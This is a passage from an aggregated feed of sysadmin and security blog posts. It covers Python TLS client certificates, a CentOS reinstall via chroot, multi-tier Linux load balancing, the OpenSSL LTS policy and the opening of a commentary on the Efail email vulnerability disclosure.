fboender @ jib ~ $ And that's about it! You can read more about direnv on its homepage. ## June 02, 2018 ### Electricmonk.nl #### SSL/TLS client certificate verification with Python v3.4+ SSLContext Normally, an SSL/TLS client verifies the server's certificate. It's also possible for the server to require a signed certificate from the client. These are called Client Certificates. This ensures that not only can the client trust the server, but the server can also trusts the client. Traditionally in Python, you'd pass the ca_certs parameter to the ssl.wrap_socket() function on the server to enable client certificates: # Client ssl.wrap_socket(s, ca_certs="ssl/server.crt", cert_reqs=ssl.CERT_REQUIRED, certfile="ssl/client.crt", keyfile="ssl/client.key") # Server ssl.wrap_socket(connection, server_side=True, certfile="ssl/server.crt", keyfile="ssl/server.key", ca_certs="ssl/client.crt") Since Python v3.4, the more secure, and thus preferred method of wrapping a socket in the SSL/TLS layer is to create an SSLContext instance and call SSLContext.wrap_socket(). However, the SSLContext.wrap_socket() method does not have the ca_certs parameter. Neither is it directly obvious how to enable requirement of client certificates on the server-side. The documentation for SSLContext.load_default_certs() does mention client certificates: Purpose.CLIENT_AUTH loads CA certificates for client certificate verification on the server side. But SSLContext.load_default_certs() loads the system's default trusted Certificate Authority chains so that the client can verify the server's certificates. You generally don't want to use these for client certificates. In the Verifying Certificates section, it mentions that you need to specify CERT_REQUIRED: In server mode, if you want to authenticate your clients using the SSL layer (rather than using a higher-level authentication mechanism), you’ll also have to specify CERT_REQUIRED and similarly check the client certificate. I didn't spot how to specify CERT_REQUIRED in either the SSLContext constructor or the wrap_socket() method. Turns out you have to manually set a property on the SSLContext on the server to enable client certificate verification, like this: context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH) context.verify_mode = ssl.CERT_REQUIRED context.load_cert_chain(certfile=server_cert, keyfile=server_key) context.load_verify_locations(cafile=client_certs) Here's a full example of a client and server who both validate each other's certificates: For this example, we'll create Self-signed server and client certificates. Normally you'd use a server certificate from a Certificate Authority such as Let's Encrypt, and would setup your own Certificate Authority so you can sign and revoke client certificates. Create server certificate: openssl req -new -newkey rsa:2048 -days 365 -nodes -x509 -keyout server.key -out server.crt  Make sure to enter 'example.com' for the Common Name. Next, generate a client certificate: openssl req -new -newkey rsa:2048 -days 365 -nodes -x509 -keyout client.key -out client.crt The Common Name for the client certificate doesn't really matter. Client code: #!/usr/bin/python3 import socket import ssl host_addr = '127.0.0.1' host_port = 8082 server_sni_hostname = 'example.com' server_cert = 'server.crt' client_cert = 'client.crt' client_key = 'client.key' context = ssl.create_default_context(ssl.Purpose.SERVER_AUTH, cafile=server_cert) context.load_cert_chain(certfile=client_cert, keyfile=client_key) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) conn = context.wrap_socket(s, server_side=False, server_hostname=server_sni_hostname) conn.connect((host_addr, host_port)) print("SSL established. Peer: {}".format(conn.getpeercert())) print("Sending: 'Hello, world!") conn.send(b"Hello, world!") print("Closing connection") conn.close() Server code: #!/usr/bin/python3 import socket from socket import AF_INET, SOCK_STREAM, SO_REUSEADDR, SOL_SOCKET, SHUT_RDWR import ssl listen_addr = '127.0.0.1' listen_port = 8082 server_cert = 'server.crt' server_key = 'server.key' client_certs = 'client.crt' context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH) context.verify_mode = ssl.CERT_REQUIRED context.load_cert_chain(certfile=server_cert, keyfile=server_key) context.load_verify_locations(cafile=client_certs) bindsocket = socket.socket() bindsocket.bind((listen_addr, listen_port)) bindsocket.listen(5) while True: print("Waiting for client") newsocket, fromaddr = bindsocket.accept() print("Client connected: {}:{}".format(fromaddr[0], fromaddr[1])) conn = context.wrap_socket(newsocket, server_side=True) print("SSL established. Peer: {}".format(conn.getpeercert())) buf = b'' # Buffer to hold received client data try: while True: data = conn.recv(4096) if data: # Client sent us data. Append to buffer buf += data else: # No more data from client. Show buffer and close connection. print("Received:", buf) break finally: print("Closing connection") conn.shutdown(socket.SHUT_RDWR) conn.close() Output from the server looks like this: $ python3 ./server.py
Waiting for client
Client connected: 127.0.0.1:51372
SSL established. Peer: {'subject': ((('countryName', 'AU'),),
(('stateOrProvinceName', 'Some-State'),), (('organizationName', 'Internet
Widgits Pty Ltd'),), (('commonName', 'someclient'),)), 'issuer':
((('countryName', 'AU'),), (('stateOrProvinceName', 'Some-State'),),
(('organizationName', 'Internet Widgits Pty Ltd'),), (('commonName',
'someclient'),)), 'notBefore': 'Jun  1 08:05:39 2018 GMT', 'version': 3,
'serialNumber': 'A564F9767931F3BC', 'notAfter': 'Jun  1 08:05:39 2019 GMT'}
Closing connection
Waiting for client

Output from the client:

python3 ./client.py SSL established. Peer: {'notBefore': 'May 30 20:47:38 2018 GMT', 'notAfter': 'May 30 20:47:38 2019 GMT', 'subject': ((('countryName', 'NL'),), (('stateOrProvinceName', 'GLD'),), (('localityName', 'Ede'),), (('organizationName', 'Electricmonk'),), (('commonName', 'example.com'),)), 'issuer': ((('countryName', 'NL'),), (('stateOrProvinceName', 'GLD'),), (('localityName', 'Ede'),), (('organizationName', 'Electricmonk'),), (('commonName', 'example.com'),)), 'version': 3, 'serialNumber': 'CAEC89334941FD9F'} Sending: 'Hello, world! Closing connection A few notes: • You can concatenate multiple client certificates into a single PEM file to authenticate different clients. • You can re-use the same cert and key on both the server and client. This way, you don't need to generate a specific client certificate. However, any clients using that certificate will require the key, and will be able to impersonate the server. There's also no way to distinguish between clients anymore. • You don't need to setup your own Certificate Authority and sign client certificates. You can just generate them with the above mentioned openssl command and add them to the trusted certificates file. If you no longer trust the client, just remove the certificate from the file. • I'm not sure if the server verifies the client certificate's expiration date. ## June 01, 2018 ### Everything Sysadmin #### I'm hiring SREs/sysadmins and more! My team at Stack Overflow has a number of open positions on the team that I manage: 1. Windows-focused SRE, New York City or Northern NJ: If you love PowerShell, you'll love this position! If your background is more sysadmin than SRE, we're willing to train. 2. Linux SRE, Denver: This will be particularly exciting because we're about to make some big technology changes and it will be a great opportunity to learn and grow with the company. We have a number of other openings around the company: 1. Junior Technology Concierge (IT Help Desk): New York City 2. Engineering Manager: Remote (US East Coast Time Zone) 3. VP of Engineering: New York City. (This person will be my boss!) 4. Technical Recruiter: New York, NY 5. If you like working in the Windows developer ecosystem (C#, ASP.NET, and MS SQL Server), we have two such developer positions: web developer and internal apps developer. Those (and more!) open positions are listed here: https://stackoverflow.com/work-here ### Anton Chuvakin - Security Warrior #### Monthly Blog Round-Up – May 2018 Here is my next monthly "Security Warrior" blog round-up of top 5 popular posts based on last month’s visitor data (excluding other monthly or annual round-ups): 1. “New SIEM Whitepaper on Use Cases In-Depth OUT!” (dated 2010 – much ancient!) presents a whitepaper on select SIEM use cases described in depth with rules and reports [using now-defunct SIEM product]; also see this SIEM use case in depth and this for a more current list of popular SIEM use cases. Finally, see our research on developing security monitoring use cases here – and that we UPDATED FOR 2018. 2. Why No Open Source SIEM, EVER?” contains some of my SIEM thinking from 2009 (oh, wow, ancient history!). Is it relevant now? You be the judge. Succeeding with SIEM requires a lot of work, whether you paid for the software, or not. BTW, this post has an amazing “staying power” that is hard to explain – I suspect it has to do with people wanting “free stuff” and googling for “open source SIEM” … 3. Simple Log Review Checklist Released!” is often at the top of this list – this rapidly aging checklist is still a useful tool for many people. “On Free Log Management Tools” (also aged quite a bit by now) is a companion to the checklist (updated version) 4. Updated With Community Feedback SANS Top 7 Essential Log Reports DRAFT2” is about top log reports project of 2008-2013, I think these are still very useful in response to “what reports will give me the best insight from my logs?” 5. Again, my classic PCI DSS Log Review series is extra popular! The series of 18 posts cover a comprehensive log review approach (OK for PCI DSS 3+ even though it predates it), useful for building log review processes and procedures, whether regulatory or not. It is also described in more detail in our Log Management book and mentioned in our PCI book – note that this series is even mentioned in some PCI Council materials. In addition, I’d like to draw your attention to a few recent posts from my Gartner blog [which, BTW, now has more than 7X of the traffic of this blog]: Critical reference posts: Current research on SIEM, SOC, etc Just finished research on testing security: Just finished research on threat detection “starter kit” Miscellaneous fun posts: (see all my published Gartner research here) Also see my past monthly and annual “Top Popular Blog Posts” – 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017. Disclaimer: most content at SecurityWarrior blog was written before I joined Gartner on August 1, 2011 and is solely my personal view at the time of writing. For my current security blogging, go here. Other posts in this endless series: ## May 24, 2018 ### The Lone Sysadmin #### vSphere 6.7 Will Not Run In My Lab: A Parable “Hey Bob, I tried installing vSphere 6.7 on my lab servers and it doesn’t work right. You tried using it yet? Been beating my head against a wall here.” “Yeah, I really like it. A lot. Like, resisting the urge to be irresponsible and upgrade everything. What are your lab servers?” I knew what he […] The post vSphere 6.7 Will Not Run In My Lab: A Parable appeared first on The Lone Sysadmin. Head over to the source to read the full post! ## May 23, 2018 ### Evaggelos Balaskas #### CentOS Bootstrap ## CentOS 6 This way is been suggested for building a container image from your current centos system. In my case, I need to remote upgrade a running centos6 system to a new clean centos7 on a test vps, without the need of opening the vnc console, attaching a new ISO etc etc. I am rather lucky as I have a clean extra partition to this vps, so I will follow the below process to remote install a new clean CentOS 7 to this partition. Then add a new grub entry and boot into this partition. ### Current OS # cat /etc/redhat-release CentOS release 6.9 (Final) ### Format partition format & mount the partition:  mkfs.ext4 -L rootfs /dev/vda5 mount /dev/vda5 /mnt/ ### InstallRoot Type: # yum -y groupinstall "Base" --releasever 7 --installroot /mnt/ --nogpgcheck ### Test test it, when finished: mount --bind /dev/ /mnt/dev/ mount --bind /sys/ /mnt/sys/ mount --bind /proc/ /mnt/proc/ chroot /mnt/ bash-4.2# cat /etc/redhat-release CentOS Linux release 7.5.1804 (Core) It works! ### Root Password inside chroot enviroment: bash-4.2# passwd Changing password for user root. New password: Retype new password: passwd: all authentication tokens updated successfully. bash-4.2# exit ## Grub adding the new grub entry for CentOS 7 title CentOS 7 root (hd0,4) kernel /boot/vmlinuz-3.10.0-862.2.3.el7.x86_64 root=/dev/vda5 ro rhgb LANG=en_US.UTF-8 initrd /boot/initramfs-3.10.0-862.2.3.el7.x86_64.img by changing the default boot entry from 0 to 1 : default=0 to default=1 our system will boot into centos7 when reboot! ### syslog.me #### Concurrency in Go In my quest to learn the Go language I am currently in the process of doing the Go Code Clinic. It’s taking me quite some time because instead of going through the solutions proposed in the course I try to implement a solution by myself; only when I have no idea whatsoever about how to proceed I peep into the solution to get some insight, and then work independently on my solution again. The second problem in the Clinic is already at a non-trivial level: compare a number of images with a bigger image to check if any of those is a “clipping” of the bigger one. I confess that I would have a lot to read and to work even if I was trying to solve it in Perl! It took some banging of my head to the wall till I eventually solved the problem. Unfortunately my program is single-threaded and the process of matching images is very expensive. For example, it took more than two hours to match a clipping sized 967×562 pixels with it’s “base” image sized 2048×1536. And for the whole time only one CPU thread was running 100%, the others where barely used.If I really want to say that I solved the problem I must adapt the program to the available computing power by starting a number of subprocesses/threads (in our case: goroutines) to distribute the search across several CPU threads. Since this was completely new to me in golang, I decided to experiment with a much simpler program: generate up to 100 random integers (say) between 0 and 10000 and run 8 workers to find if any of these random numbers is a multiple of another number, for example 17. And of course the program must shut down gracefully, whether or not a multiple is found. This gave me a few problems to solve: • how do I start exactly 8 worker goroutines? • what’s the best way to pass them the numbers to check? what’s the best way for them to report back the result? • how do I tell them to stop when it’s time that they shut down? • how do I wait that they are actually shut down? The result is the go program that you can find in this gist. Assuming that it is good enough, you can use it as a skeleton for a program of yours, re-implementing the worker part and maybe the reaper part if a boolean response is not enough. Enjoy! #### Lightning Calendar, Google and “foreign” addresses This is written to my older self, and to all those using Mozilla Thunderbird and the Lightning Calendar add-on with Google calendars and they see this: If you are seeing this, the solution is to change the setting calendar.google.enableEmailInvitations to true: and everything should work as expected: Enjoy! ### Vincent Bernat #### Multi-tier load-balancing with Linux A common solution to provide a highly-available and scalable service is to insert a load-balancing layer to spread requests from users to backend servers.1 We usually have several expectations for such a layer: scalability It allows a service to scale by pushing traffic to newly provisioned backend servers. It should also be able to scale itself when it becomes the bottleneck. availability It provides high availability to the service. If one server becomes unavailable, the traffic should be quickly steered to another server. The load-balancing layer itself should also be highly available. flexibility It handles both short and long connections. It is flexible enough to offer all the features backends generally expect from a load-balancer like TLS or HTTP routing. operability With some cooperation, any expected change should be seamless: rolling out a new software on the backends, adding or removing backends, or scaling up or down the load-balancing layer itself. The problem and its solutions are well known. From recently published articles on the topic, “Introduction to modern network load-balancing and proxying” provides an overview of the state of the art. Google released “Maglev: A Fast and Reliable Software Network Load Balancer” describing their in-house solution in details.2 However, the associated software is not available. Basically, building a load-balancing solution with commodity servers consists of assembling three components: • ECMP routing • stateless L4 load-balancing • stateful L7 load-balancing In this article, I describe and support a multi-tier solution using Linux and only open-source components. It should offer you the basis to build a production-ready load-balancing layer. Update (2018.05) Facebook just released Katran, an L4 load-balancer implemented with XDP and eBPF and using consistent hashing. It could be inserted in the configuration described below. # Last tier: L7 load-balancing⚓︎ Let’s start with the last tier. Its role is to provide high availability, by forwarding requests to only healthy backends, and scalability, by spreading requests fairly between them. Working in the highest layers of the OSI model, it can also offer additional services, like TLS-termination, HTTP routing, header rewriting, rate-limiting of unauthenticated users, and so on. Being stateful, it can leverage complex load-balancing algorithm. Being the first point of contact with backend servers, it should ease maintenances and minimize impact during daily changes. It also terminates client TCP connections. This introduces some loose coupling between the load-balancing components and the backend servers with the following benefits: • connections to servers can be kept open for lower resource use and latency, • requests can be retried transparently in case of failure, • clients can use a different IP protocol than servers, and • servers do not have to care about path MTU discovery, TCP congestion control algorithms, avoidance of the TIME-WAIT state and various other low-level details. Many pieces of software would fit in this layer and an ample literature exists on how to configure them. You could look at HAProxy, Envoy or Træfik. Here is a configuration example for HAProxy: # L7 load-balancer endpoint frontend l7lb # Listen on both IPv4 and IPv6 bind :80 v4v6 # Redirect everything to a default backend default_backend servers # Healthchecking acl dead nbsrv(servers) lt 1 acl disabled nbsrv(enabler) lt 1 monitor-uri /healthcheck monitor fail if dead || disabled # IPv6-only servers with HTTP healthchecking and remote agent checks backend servers balance roundrobin option httpchk server web1 [2001:db8:1:0:2::1]:80 send-proxy check agent-check agent-port 5555 server web2 [2001:db8:1:0:2::2]:80 send-proxy check agent-check agent-port 5555 server web3 [2001:db8:1:0:2::3]:80 send-proxy check agent-check agent-port 5555 server web4 [2001:db8:1:0:2::4]:80 send-proxy check agent-check agent-port 5555 # Fake backend: if the local agent check fails, we assume we are dead backend enabler server enabler [::1]:0 agent-check agent-port 5555  This configuration is the most incomplete piece of this guide. However, it illustrates two key concepts for operability: 1. Healthchecking of the web servers is done both at HTTP-level (with check and option httpchk) and using an auxiliary agent check (with agent-check). The later makes it easy to put a server to maintenance or to orchestrate a progressive rollout. On each backend, you need a process listening on port 5555 and reporting the status of the service (UP, DOWN, MAINT). A simple socat process can do the trick:3 socat -ly \ TCP6-LISTEN:5555,ipv6only=0,reuseaddr,fork \ OPEN:/etc/lb/agent-check,rdonly  Put UP in /etc/lb/agent-check when the service is in nominal mode. If the regular healthcheck is also positive, HAProxy will send requests to this node. When you need to put it in maintenance, write MAINT and wait for the existing connections to terminate. Use READY to cancel this mode. 2. The load-balancer itself should provide an healthcheck endpoint (/healthcheck) for the upper tier. It will return a 503 error if either there is no backend servers available or if put down the enabler backend through the agent check. The same mechanism as for regular backends can be used to signal the unavailability of this load-balancer. Additionally, the send-proxy directive enables the proxy protocol to transmit the real clients’ IP addresses. This protocol also works for non-HTTP connections and is supported by a variety of servers, including nginx: http { server { listen [::]:80 default ipv6only=off proxy_protocol; root /var/www; set_real_ip_from ::/0; real_ip_header proxy_protocol; } }  As is, this solution is not complete. We have just moved the availability and scalability problem somewhere else. How do we load-balance the requests between the load-balancers? # First tier: ECMP routing⚓︎ On most modern routed IP networks, redundant paths exist between clients and servers. For each packet, routers have to choose a path. When the cost associated to each path is equal, incoming flows4 are load-balanced among the available destinations. This characteristic can be used to balance connections among available load-balancers: There is little control over the load-balancing but ECMP routing brings the ability to scale horizontally both tiers. A common way to implement such a solution is to use BGP, a routing protocol to exchange routes between network equipments. Each load-balancer announces to its connected routers the IP addresses it is serving. If we assume you already have BGP-enabled routers available, ExaBGP is a flexible solution to let the load-balancers advertise their availability. Here is a configuration for one of the load-balancers: # Healthcheck for IPv6 process service-v6 { run python -m exabgp healthcheck -s --interval 10 --increase 0 --cmd "test -f /etc/lb/v6-ready -a ! -f /etc/lb/disable"; encoder text; } template { # Template for IPv6 neighbors neighbor v6 { router-id 192.0.2.132; local-address 2001:db8::192.0.2.132; local-as 65000; peer-as 65000; hold-time 6; family { ipv6 unicast; } api services-v6 { processes [ service-v6 ]; } } } # First router neighbor 2001:db8::192.0.2.254 { inherit v6; } # Second router neighbor 2001:db8::192.0.2.253 { inherit v6; }  If /etc/lb/v6-ready is present and /etc/lb/disable is absent, all the IP addresses configured on the lo interface will be announced to both routers. If the other load-balancers use a similar configuration, the routers will distribute incoming flows between them. Some external process should manage the existence of the /etc/lb/v6-ready file by checking for the healthiness of the load-balancer (using the /healthcheck endpoint for example). An operator can remove a load-balancer from the rotation by creating the /etc/lb/disable file. To get more details on this part, have a look at “High availability with ExaBGP.” If you are in the cloud, this tier is usually implemented by your cloud provider, either using an anycast IP address or a basic L4 load-balancer. Unfortunately, this solution is not resilient when an expected or unexpected change happens. Notably, when adding or removing a load-balancer, the number of available routes for a destination changes. The hashing algorithm used by routers is not consistent and flows are reshuffled among the available load-balancers, breaking existing connections: Moreover, each router may choose its own routes. When a router becomes unavailable, the second one may route the same flows differently: If you think this is not an acceptable outcome, notably if you need to handle long connections like file downloads, video streaming or websocket connections, you need an additional tier. Keep reading! # Second tier: L4 load-balancing⚓︎ The second tier is the glue between the stateless world of IP routers and the stateful land of L7 load-balancing. It is implemented with L4 load-balancing. The terminology can be a bit confusing here: this tier routes IP datagrams (no TCP termination) but the scheduler uses both destination IP and port to choose an available L7 load-balancer. The purpose of this tier is to ensure all members take the same scheduling decision for an incoming packet. There are two options: • stateful L4 load-balancing with state synchronization accross the members, or • stateless L4 load-balancing with consistent hashing. The first option increases complexity and limits scalability. We won’t use it.5 The second option is less resilient during some changes but can be enhanced with an hybrid approach using a local state. We use IPVS, a performant L4 load-balancer running inside the Linux kernel, with Keepalived, a frontend to IPVS with a set of healthcheckers to kick out an unhealthy component. IPVS is configured to use the Maglev scheduler, a consistent hashing algorithm from Google. Among its family, this is a great algorithm because it spreads connections fairly, minimizes disruptions during changes and is quite fast at building its lookup table. Finally, to improve performance, we let the last tier—the L7 load-balancers—sends back answers directly to the clients without involving the second tier—the L4 load-balancers. This is referred to as direct server return (DSR) or direct routing (DR). With such a setup, we expect packets from a flow to be able to move freely between the components of the two first tiers while sticking to the same L7 load-balancer. ## Configuration⚓︎ Assuming ExaBGP has already been configured like described in the previous section, let’s start with the configuration of Keepalived: virtual_server_group VS_GROUP_MH_IPv6 { 2001:db8::198.51.100.1 80 } virtual_server group VS_GROUP_MH_IPv6 { lvs_method TUN # Tunnel mode for DSR lvs_sched mh # Scheduler: Maglev sh-port # Use port information for scheduling protocol TCP delay_loop 5 alpha # All servers are down on start omega # Execute quorum_down on shutdown quorum_up "/bin/touch /etc/lb/v6-ready" quorum_down "/bin/rm -f /etc/lb/v6-ready" # First L7 load-balancer real_server 2001:db8::192.0.2.132 80 { weight 1 HTTP_GET { url { path /healthcheck status_code 200 } connect_timeout 2 } } # Many others... }  The quorum_up and quorum_down statements define the commands to be executed when the service becomes available and unavailable respectively. The /etc/lb/v6-ready file is used as a signal to ExaBGP to advertise the service IP address to the neighbor routers. Additionally, IPVS needs to be configured to continue routing packets from a flow moved from another L4 load-balancer. It should also continue routing packets from unavailable destinations to ensure we can drain properly a L7 load-balancer. # Schedule non-SYN packets sysctl -qw net.ipv4.vs.sloppy_tcp=1 # Do NOT reschedule a connection when destination # doesn't exist anymore sysctl -qw net.ipv4.vs.expire_nodest_conn=0 sysctl -qw net.ipv4.vs.expire_quiescent_template=0  The Maglev scheduling algorithm will be available with Linux 4.18, thanks to Inju Song. For older kernels, I have prepared a backport.6 Use of source hashing as a scheduling algorithm will hurt the resilience of the setup. DSR is implemented using the tunnel mode. This method is compatible with routed datacenters and cloud environments. Requests are tunneled to the scheduled peer using IPIP encapsulation. It adds a small overhead and may lead to MTU issues. If possible, ensure you are using a larger MTU for communication between the second and the third tier.7 Otherwise, it is better to explicitely allow fragmentation of IP packets: sysctl -qw net.ipv4.vs.pmtu_disc=0  You also need to configure the L7 load-balancers to handle encapsulated traffic:8 # Setup IPIP tunnel to accept packets from any source ip tunnel add tunlv6 mode ip6ip6 local 2001:db8::192.0.2.132 ip link set up dev tunlv6 ip addr add 2001:db8::198.51.100.1/128 dev tunlv6  ## Evaluation of the resilience⚓︎ As configured, the second tier increases the resilience of this setup for two reasons: 1. The scheduling algorithm is using a consistent hash to choose its destination. Such an algorithm reduces the negative impact of expected or unexpected changes by minimizing the number of flows moving to a new destination. “Consistent Hashing: Algorithmic Tradeoffs” offers more details on this subject. 2. IPVS keeps a local connection table for known flows. When a change impacts only the third tier, existing flows will be correctly directed according to the connection table. If we add or remove a L4 load-balancer, existing flows are not impacted because each load-balancer takes the same decision, as long as they see the same set of L7 load-balancers: If we add a L7 load-balancer, existing flows are not impacted either because only new connections will be scheduled to it. For existing connections, IPVS will look at its local connection table and continue to forward packets to the original destination. Similarly, if we remove a L7 load-balancer, only existing flows terminating at this load-balancer are impacted. Other existing connections will be forwarded correctly: We need to have simultaneous changes on both levels to get a noticeable impact. For example, when adding both a L4 load-balancer and a L7 load-balancer, only connections moved to a L4 load-balancer without state and scheduled to the new load-balancer will be broken. Thanks to the consistent hashing algorithm, other connections will stay bound to the right L7 load-balancer. During a planned change, this disruption can be minimized by adding the new L4 load-balancers first, waiting a few minutes, then adding the new L7 load-balancers. Additionally, IPVS correctly routes ICMP messages to the same L7 load-balancers as the associated connections. This ensures notably path MTU discovery works and there is no need for smart workarounds. # Tier 0: DNS load-balancing⚓︎ Optionally, you can add DNS load-balancing to the mix. This is useful either if your setup is spanned accross multiple datacenters, or multiple cloud regions, or if you want to break a large load-balancing cluster into smaller ones. It is not intended to replace the first tier as it doesn’t share the same characteristics: load-balancing is unfair (it is not flow-based) and recovery from a failure is slow. gdnsd is an authoritative-only DNS server with integrated healthchecking. It can serve zones from master files using the RFC 1035 zone format: @ SOA ns1 ns1.example.org. 1 7200 1800 259200 900 @ NS ns1.example.com. @ NS ns1.example.net. @ MX 10 smtp @ 60 DYNA multifo!web www 60 DYNA multifo!web smtp A 198.51.100.99  The special RR type DYNA will return A and AAAA records after querying the specified plugin. Here, the multifo plugin implements an all-active failover of monitored addresses: service_types => { web => { plugin => http_status url_path => /healthcheck down_thresh => 5 interval => 5 } ext => { plugin => extfile file => /etc/lb/ext def_down => false } } plugins => { multifo => { web => { service_types => [ ext, web ] addrs_v4 => [ 198.51.100.1, 198.51.100.2 ] addrs_v6 => [ 2001:db8::198.51.100.1, 2001:db8::198.51.100.2 ] } } }  In nominal state, an A request will be answered with both 198.51.100.1 and 198.51.100.2. An healthcheck failure will update the returned set accordingly. It is also possible to administratively remove an entry by modifying the /etc/lb/ext file. For example, with the following content, 198.51.100.2 will not be advertised anymore: 198.51.100.1 => UP 198.51.100.2 => DOWN 2001:db8::c633:6401 => UP 2001:db8::c633:6402 => UP  You can find all the configuration files and the setup of each tier in the GitHub repository. If you want to replicate this setup at a smaller scale, it is possible to collapse the second and the third tiers by using either localnode or network namespaces. Even if you don’t need its fancy load-balancing services, you should keep the last tier: while backend servers come and go, the L7 load-balancers bring stability, which translates to resiliency. 1. In this article, “backend servers” are the servers behind the load-balancing layer. To avoid confusion, we will not use the term “frontend.” ↩︎ 2. A good summary of the paper is available from Adrian Colyer. From the same author, you may also have a look at the summary for “Stateless datacenter load-balancing with Beamer.” ↩︎ 3. If you feel this solution is fragile, feel free to develop your own agent. It could coordinate with a key-value store to determine the wanted state of the server. It is possible to centralize the agent in a single location, but you may get a chicken-and-egg problem to ensure its availability. ↩︎ 4. A flow is usually determined by the source and destination IP and the L4 protocol. Alternatively, the source and destination port can also be used. The router hashes these information to choose the destination. For Linux, you may find more information on this topic in “Celebrating ECMP in Linux.” ↩︎ 5. On Linux, it can be implemented by using Netfilter for load-balancing and conntrackd to synchronize state. IPVS only provides active/backup synchronization. ↩︎ 6. The backport is not strictly equivalent to its original version. Be sure to check the README file to understand the differences. Briefly, in Keepalived configuration, you should: • not use inhibit_on_failure • use sh-port • not use sh-fallback ↩︎ 7. At least 1520 for IPv4 and 1540 for IPv6. ↩︎ 8. As is, this configuration is a insecure. You need to ensure only the L4 load-balancers will be able to send IPIP traffic. ↩︎ ## May 22, 2018 ### SysAdmin1138 #### Database schemas vs. identity Yesterday brought this tweet up: This is amazingly bad wording, and is the kind of thing that made the transpeople in my timeline (myself included) go "Buwhuh?" and me to wonder if this was a snopes worthy story. No, actually. The key phrase here is, "submit your prints for badges". There are two things you should know: 1. NASA works on National Security related things, which requires a security clearance to work on, and getting one of those requires submitting prints. 2. The FBI is the US Government's authority in handling biometric data Here is a chart from the Electronic Biometric Transmission Specification, which describes a kind of API for dealing with biometric data. If Following Condition ExistsEnter Code Subject's gender reported as femaleF Occupation or charge indicated "Male Impersonator"G Subject's gender reported as maleM Occupation or charge indicated "Female Impersonator" or transvestiteN Male name, no gender givenY Female name, no gender givenZ Unknown genderX Yep, it really does use the term "Female Impersonator". To a transperson living in 2016 getting their first Federal job (even as a contractor), running into these very archaic terms is extremely off-putting. As someone said in a private channel: This looks like some 1960's bureaucrat trying to be 'inclusive' This is not far from the truth. This table exists unchanged in the 7.0 version of the document, dated January 1999. Previous versions are in physical binders somewhere, and not archived on the Internet; but the changelog for the V7 document indicates that this wording was in place as early as 1995. Mention is also made of being interoperable with UK law-enforcement. The NIST standard for fingerprints issued in 1986 mentions a SEX field, but it only has M, F, and U; later NIST standards drop this field definition entirely. As this field was defined in standard over 20 years ago and has not been changed, is used across the full breadth of the US justice system, is referenced in International communications standards including Visa travel, and used as the basis for US Military standards, these field definitions are effectively immutable and will only change after concerted effort over decades. This is what institutionalized transphobia looks like, and we will be dealing with it for another decade or two. If not longer. The way to deal with this is to deprecate the codes in documentation, but still allow them as valid. • Create a deprecation notice in the definition of the field saying that the G and N values are to be considered deprecated and should not be used. • In the deprecation notice say that in the future, new records will not be accepted with those values. • Those values will remain valid for queries, because there are decades of legacy-coding in databases using them. The failure-mode of this comes in with form designers who look at the spec and build forms based on the spec. Like this example from Maryland. Which means we need to let the forms designers know that the spec needs to be selectively ignored. The deprecation notice does that. At the local level, convince your local City Council to pass resolutions to modernize their Police forms to reflect modern sensibilities, and drop the G and N codes from intake forms. Do this at the County too, for the Sheriff's department. At the state level, convince your local representatives to push resolutions to get the State Patrol to modernize their forms likewise. Drop the G and N codes from the forms. At the Federal employee level, there is less to be done here as you're closer to the governing standards, but you may be able to convince The Powers That Be to drop the two offensive checkboxes or items from the drop-down list. At the Federal standard level. Lobby the decision makers that govern this standard and push for a deprecation notice. If any of your congress-people are on any Judiciary committees, you'll have more luck than most. ## May 18, 2018 ### OpenSSL #### New LTS Release Back around the end of 2014 we posted our release strategy. This was the first time we defined support timelines for our releases, and added the concept of an LTS (long-term support) release. At our OMC meeting earlier this month, we picked our next LTS release. This post walks through that announcement, and tries to explain all the implications of it. Once an official release is made, it then enters support mode. No new features are added – those only go into the next release. In rare cases we will make an exception; for example, we said that if any accessors or setters are missing in 1.1.0, because of structures being made opaque, we would treat that as a bug. Support itself is divided into three phases. First, there is active and ongoing support. All bugs are appropriate for this phase. This happens once the release is published. Next is the security-only phase, where we only fix security bugs, which will typically have a CVE associated with them. This happens for the final year of support. Finally, there is EOL (end of life), where the project no longer provides any support or fixes. In the typical case, a release is supported for at least two years, which means one year of fixes and one year of security-only fixes. Some releases, however, are designated as LTS releases. They are supported for at least five years. We will specify an LTS release at least every four years, which gives the community at least a year to migrate. Our current LTS release is 1.0.2, and it will be supported until the end of 2019. During that last year it will only receive security fixes. Although we are extended 1.1.0 support, we explicitly decided not to do it again, for either release. Our next LTS release will be 1.1.1 which is currently in beta. As long as the release is out before the end of 2018, there is more than a year to migrate. (We’re confident it will be out before then, of course.) We encourage everyone to start porting to the OpenSSL master branch. The 1.1.0 release will be supported for one year after 1.1.1 is released. And again, during that final year we will only provide security fixes. Fortunately, 1.1.0 is ABI compatible with 1.1.1, so moving up should not be difficult. Our TLS 1.3 wiki page has some more details around the impact of TLS 1.3 support. Finally, this has an impact on the OpenSSL FIPS module, #1747. That module is valid until the January 29, 2022. This means that for the final two-plus years of its validity, we will not be supporting the release on which the module is based. We have already stated that we do not support the module itself; this adds to the burden that vendors will have to take on. On the positive side, we’re committed to a new FIPS module, it will be based on the current codebase, and we think we can get it done fairly quickly. ## May 17, 2018 ### Cryptography Engineering #### Was the Efail disclosure horribly screwed up? TL;DR. No. Or keep reading if you want. On Monday a team of researchers from Münster, RUB and NXP disclosed serious cryptographic vulnerabilities in a number of encrypted email clients. The flaws, which go by the cute vulnerability name of “Efail”, potentially allow an attacker to decrypt S/MIME or PGP-encrypted email with only minimal user interaction. By the standards of cryptographic vulnerabilities, this is about as bad as things get. In short: if an attacker can intercept and alter an encrypted email — say, by sending you a new (altered) copy, or modifying a copy stored on your mail server — they can cause many GUI-based email clients to send the full plaintext of the email to an attacker controlled-server. Even worse, most of the basic problems that cause this flaw have been known for years, and yet remain in clients. The big (and largely under-reported) story of EFail is the way it affects S/MIME. That “corporate” email protocol is simultaneously (1) hated by the general crypto community because it’s awful and has a slash in its name, and yet (2) is probably the most widely-used email encryption protocol in the corporate world. The table at the right — excerpted from the paper — gives you a flavor of how Efail affects S/MIME clients. TL;DR it affects them very badly. Efail also happens to affect a smaller, but non-trivial number of OpenPGP-compatible clients. As one might expect (if one has spent time around PGP-loving folks) the disclosure of these vulnerabilities has created something of a backlash on HN, and among people who make and love OpenPGP clients. Mostly for reasons that aren’t very defensible. So 